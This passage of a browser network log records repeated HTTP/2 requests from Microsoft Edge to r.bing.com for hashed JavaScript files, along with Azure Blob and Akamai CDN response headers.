accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: 8HiZsvqDmIcMLctdf+RPxQ==
last-modified: Wed, 28 Feb 2024 05:35:34 GMT
etag: 0x8DC381F1640A445
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: ea4ed4b3-501e-004d-0182-6a8ac6000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.65361602.1709157817.193af6a9
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
akamai-grn: 0.4b281102.1709158320.6f4260b
cache-control: public, no-transform, max-age=362351
expires: Mon, 04 Mar 2024 20:11:00 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d939
timing-allow-origin: *
-
Remote address:92.123.128.139:443RequestGET /rp/bll21ZO27j3KPE27uQBxt24c2Fw.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: dOM7S1T00fPaBqtHxZNqEw==
last-modified: Tue, 20 Dec 2022 22:14:22 GMT
etag: 0x8DAE2D78C5CD6A4
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 5554e22e-301e-005b-32e4-527c11000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=98981
expires: Fri, 01 Mar 2024 19:01:30 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d93a
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/t6Tz4UURXPD2SmtEEPGLoJpq69g.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: d45HDf/HKsFpeoNenn20AQ==
last-modified: Fri, 16 Feb 2024 02:32:31 GMT
etag: 0x8DC2E9786B59446
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 0ccbcafe-901e-0020-21b2-603e8d000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 1911
cache-control: public, no-transform, max-age=62044
expires: Fri, 01 Mar 2024 08:45:53 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d93b
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/AvKJcbJ1EyHCCRmf5jCFG0kHVf8.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DC34FE405A8DD0
akamai-grn: 0.4b281102.1709181688.cc95daa
content-length: 926
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: gdSk2YZcjXr6P8qSsr7hqQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d39f3835-201e-0078-761d-67e6d2000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=374538
expires: Mon, 04 Mar 2024 23:34:07 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d93c
timing-allow-origin: *
-
Remote address:92.123.128.139:443RequestGET /rp/ClBB7fdm5DZrrkATnoyfumVXhIs.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: 7S9kM1GKgkTj6PIM71pmuw==
last-modified: Thu, 01 Feb 2024 02:18:12 GMT
etag: 0x8DC22CC0A7E9057
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: c935fe49-b01e-0027-0c5f-5852ee000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=143051
expires: Sat, 02 Mar 2024 07:16:00 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d93d
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/zZmQ2qIQ97HIFQdce5cTrdiR1Jw.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: bI6CDVAzS8WCYk9wwfhSOg==
last-modified: Wed, 28 Feb 2024 03:33:39 GMT
etag: 0x8DC380E0DFA0A1B
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 23da76df-001e-0040-451c-6a4212000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 1771
cache-control: public, no-transform, max-age=318718
expires: Mon, 04 Mar 2024 08:03:47 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d93e
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/AjU6jiWg-x6pnWzdPdiFX5Frlfk.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: 3JjhqfoMXEp4uchrEt3hcg==
last-modified: Thu, 22 Feb 2024 22:42:01 GMT
etag: 0x8DC33F77C8EC5E3
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: c1866e96-b01e-006a-2239-669d02000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 9653
cache-control: public, no-transform, max-age=280256
expires: Sun, 03 Mar 2024 21:22:45 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d93f
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/2DyrZWV35Nk6it3meHG_C7ZjJ8M.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DC2C327E3B4885
akamai-grn: 0.2d8a4917.1708625079.390b24b7
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-type: text/javascript; charset=utf-8
content-md5: Kgkc7+9N80A+VMr6RxLMbA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: aa2b9bcb-701e-005a-0356-5e23cd000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 1528
cache-control: public, no-transform, max-age=87261
expires: Fri, 01 Mar 2024 15:46:10 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d940
timing-allow-origin: *
-
Remote address:92.123.128.139:443RequestGET /rp/wkWt7BtQdqUJkCPKQdJdk548UFA.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: LYCFIbjm6VNhWIK7fmUZ5Q==
last-modified: Wed, 19 Apr 2023 12:31:36 GMT
etag: 0x8DB40D204401320
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: c8a0e653-b01e-001e-0356-2b0c89000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 273
cache-control: public, no-transform, max-age=130536
expires: Sat, 02 Mar 2024 03:47:25 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d941
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/Jnh8f1BaqA6QhGEDPml3FtXpFbY.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: PNa3LjO9nNpu6AWJXnXApA==
last-modified: Tue, 05 Sep 2023 06:26:09 GMT
etag: 0x8DBADD8FE6199EC
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 31b42dd3-501e-00dd-31dc-4315d3000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 542
cache-control: public, no-transform, max-age=106323
expires: Fri, 01 Mar 2024 21:03:52 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d942
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/nc60aT-MXWFDGmlflZLjNBVVxkM.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: FOSg83CHS0e4hPgLfMT99Q==
last-modified: Fri, 20 Oct 2023 23:58:35 GMT
etag: 0x8DBD1C878DF6220
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: ddea51e8-e01e-00d8-6237-1ec708000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 3450
cache-control: public, no-transform, max-age=105412
expires: Fri, 01 Mar 2024 20:48:41 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d943
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/CcMXS8Oo0OUnUE0LzYK9AFJ6la8.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DA801120BEDFE9
akamai-grn: 0.2518dd58.1708583087.25f97669
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-type: application/x-javascript; charset=utf-8
content-md5: rqa21C4TqvhBKaqsPZN5dA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 1904a583-a01e-00e6-35b6-2d5077000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 808
vary: Accept-Encoding
cache-control: public, no-transform, max-age=179061
expires: Sat, 02 Mar 2024 17:16:10 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d944
timing-allow-origin: *
-
Remote address:92.123.128.139:443RequestGET /rp/HqDsKR6xyRoUSYXXRfEdLVt772I.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: PX2MCYqpUzo58j8uZ/WgUQ==
last-modified: Wed, 27 Sep 2023 15:07:12 GMT
etag: 0x8DBBF6B6DACD12A
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 42d141b2-d01e-00a7-246d-63ade8000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=61444
expires: Fri, 01 Mar 2024 08:35:53 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d945
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/t5vZ9VqTO-Sl4hN969ySbvZgV0g.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DA801D3A54FAD4
akamai-grn: 0.b9777b5c.1709042267.3de6cbc4
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 823
content-type: application/x-javascript; charset=utf-8
content-encoding: br
content-md5: OWtJIHWEErxydxBW1ciLxw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 961aef67-d01e-009e-4a66-32f38f000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=223740
expires: Sun, 03 Mar 2024 05:40:49 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d946
timing-allow-origin: *
-
Remote address:92.123.128.139:443RequestGET /rp/RvRBoZ5KQDNHwbHfo-_ZBZIoYQo.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/x-javascript; charset=utf-8
content-encoding: br
content-md5: 3LAdJkykvHw5zfSSu6AY7w==
last-modified: Wed, 17 Aug 2022 05:59:41 GMT
etag: 0x8DA8015ACF2156D
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 7546043d-e01e-003c-4165-2bc996000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=76457
expires: Fri, 01 Mar 2024 12:46:06 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d947
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/5f8STjRzdjQ-8jgF3Ho7ptcTR94.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: ff2EZmKnG5jgPut2R5o8UA==
last-modified: Wed, 10 Jan 2024 07:13:06 GMT
etag: 0x8DC11AB982D4C98
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 49666368-e01e-0095-7dd0-4308e4000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 1395
vary: Accept-Encoding
cache-control: public, no-transform, max-age=47783
expires: Fri, 01 Mar 2024 04:48:12 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d948
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/2pI-3yxS71qnL6vzhVIltDQouTg.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: TJJLjTJdafNm/EE7zNTGjw==
last-modified: Thu, 15 Sep 2022 21:37:04 GMT
etag: 0x8DA97626E89520E
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f030852a-601e-009d-4d64-4fb790000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 1336
cache-control: public, no-transform, max-age=210559
expires: Sun, 03 Mar 2024 02:01:08 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d94d
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/wNhUjm3kl_kvyfrio44J6j1zdYo.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DA801E3C3632A3
akamai-grn: 0.7dc61cb8.1709080661.82ce005
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-type: application/x-javascript; charset=utf-8
content-md5: ItmcJflzfwBqUrBIYlGXpQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: cb584bb4-e01e-0095-1b4f-0b08e4000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 257
vary: Accept-Encoding
cache-control: public, no-transform, max-age=233960
expires: Sun, 03 Mar 2024 08:31:09 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d94e
timing-allow-origin: *
-
Remote address:92.123.128.139:443RequestGET /rp/9tfFg6vO9uS7FxceSoXBYqA1DZY.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
